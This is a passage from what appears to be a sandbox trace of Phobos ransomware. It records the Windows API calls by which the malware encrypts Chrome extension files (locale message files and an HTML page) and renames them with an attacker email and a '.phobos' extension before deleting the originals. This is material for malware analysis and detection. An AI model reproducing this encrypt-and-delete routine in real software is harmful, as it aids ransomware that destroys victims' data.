lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0155.300] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0155.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0155.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0155.301] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0155.301] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x32a, lpOverlapped=0x0) returned 1 [0156.179] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x330, dwBufLen=0x330 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x330) returned 1 [0156.179] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x330, lpOverlapped=0x0) returned 1 [0156.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0156.180] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.180] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0156.180] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.180] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0156.181] CryptDestroyKey (hKey=0xa327e8) returned 1 [0156.181] CloseHandle (hObject=0x194) returned 1 [0156.181] CloseHandle (hObject=0x138) returned 1 [0156.181] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html")) returned 1 [0156.183] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0156.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0156.185] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=886) returned 1 [0156.185] CloseHandle (hObject=0x138) returned 1 [0156.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json")) returned 0x2020 [0156.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0156.186] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.186] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0156.186] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0156.186] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.186] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x376, lpOverlapped=0x0) returned 1 [0156.343] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x380, dwBufLen=0x380 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x380) returned 1 [0156.343] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x380, lpOverlapped=0x0) returned 1 [0156.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0156.645] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.645] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0156.645] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.645] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0156.645] CryptDestroyKey (hKey=0xa327e8) returned 1 [0156.645] CloseHandle (hObject=0x138) returned 1 [0156.645] CloseHandle (hObject=0x194) returned 1 [0156.646] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json")) returned 1 [0156.647] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0156.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0156.648] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=663) returned 1 [0156.648] CloseHandle (hObject=0x194) returned 1 [0156.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json")) returned 0x2020 [0156.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0156.649] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.649] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0156.649] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0156.649] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.649] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x297, lpOverlapped=0x0) returned 1 [0156.741] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0156.741] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0156.742] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0156.742] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.742] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0156.742] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.742] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0156.743] CryptDestroyKey (hKey=0xa327e8) returned 1 [0156.743] CloseHandle (hObject=0x194) returned 1 [0156.743] CloseHandle (hObject=0x138) returned 1 [0156.743] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json")) returned 1 [0156.744] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0156.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0156.744] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=642) returned 1 [0156.744] CloseHandle (hObject=0x138) returned 1 [0156.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json")) returned 0x2020 [0156.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0156.744] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.745] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0156.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0156.745] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.745] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x282, lpOverlapped=0x0) returned 1 [0156.752] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290, dwBufLen=0x290 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290) returned 1 [0156.752] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x290, lpOverlapped=0x0) returned 1 [0156.753] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0156.753] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.753] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0156.753] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.753] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0156.753] CryptDestroyKey (hKey=0xa327e8) returned 1 [0156.753] CloseHandle (hObject=0x138) returned 1 [0156.753] CloseHandle (hObject=0x194) returned 1 [0156.754] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json")) returned 1 [0156.755] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0156.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0156.755] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=701) returned 1 [0156.755] CloseHandle (hObject=0x194) returned 1 [0156.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json")) returned 0x2020 [0156.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0156.755] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.755] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0156.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0156.756] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0156.756] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0156.756] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2bd, lpOverlapped=0x0) returned 1 [0157.017] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0) returned 1 [0157.017] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2c0, 